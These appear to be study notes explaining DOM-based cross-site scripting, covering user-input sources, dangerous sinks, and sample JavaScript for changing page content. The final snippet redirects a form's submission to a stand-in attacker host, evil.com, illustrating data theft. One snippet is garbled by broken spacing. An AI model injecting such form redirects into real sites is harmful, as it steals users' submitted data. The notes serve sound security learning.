DOM-based XSS¶

links: WS TOC - Cross Site Scripting (XSS) - Index

Document Object Model (DOM) is a tree-like representation of the content of a webpage which can be manipulated by javascript (Example)
No server interaction, malicious payload can be triggered by a script already on the page which takes user input and improperly processes it, leading to script execution
Example
- Website has javascript which prints the URL of the current page using 'document.write()'
- If an attacker can manipulate the URL and add a script to it, that script will be executed when the page loads
Main point
- This type of XSS relies on the client-side environment to execute malicious scripts without communication with the server
- Bad because the server doesn't get a chance to sanitize the input
- Sanitization therefore has to happen on the client side as well
Sources: Where user input comes from
- document.URL, location.href, location.search
Sink: Where the user input goes to
- document.write(), innerHTML, element.src (dynamically adding / changing content on the page)

// Create a new node and insert it in the tree
var newli = document . createElement ( " l i " ) ; var newtxtli = document . createTextNode ( " Four " ) ; newli . appendChild ( newtxtli ) ; document . getElementById ( " menu−l i s t " ) . appendChild ( newli ) ;

// Delete a node
firstchild = document.getElementById( "menu−list" )
    .firstChild;
document.getElementById("menu−list")
    .removeChild(firstchild);

// Modify a node
document.getElementById("addbutton")
    .onclick=otherFunction;

// Change the title of a page
var title = document.getElementById("title");
title.innerHTML = "<h1>New Title</h1>";

// Remove the error messages
var node = document.getElementById("error_list");
while (node.firstChild) {
    node.removeChild(node.firstChild);
}

// Change the destination of a formular
document.getElementById("form")
    .action="https://www.evil.com/dest";

links: WS TOC - Cross Site Scripting (XSS) - Index